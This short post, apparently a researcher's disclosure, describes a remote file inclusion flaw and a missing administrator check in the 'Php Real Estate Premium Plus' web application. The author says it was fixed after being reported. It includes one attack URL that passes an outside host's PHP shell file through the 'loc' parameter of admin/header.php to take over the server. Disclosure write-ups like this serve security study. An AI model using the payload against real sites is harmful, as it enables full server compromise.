A study about a remote file inclusion #Php Real Estate

It’s a study I made about the “remote file inclusion” technique.
Php Real Estate Premium Plus had a typical bug called RFI (Remote file inclusion) and a administrator bypass
For default the header.php it dosen’t check if you are getting in as administrator.
The bug was on:

htpp://www.php-real-estate-site.com/admin/header.php

But the real and dangerous bug was that you could redirect a php-shell to manage completely the server like a administrator (root) in this way:

htpp://www.victim.com/admin/header.php?loc=http://www.site.com/php-shell.txt?

The php real estate company had resolved after a my comunication about this bug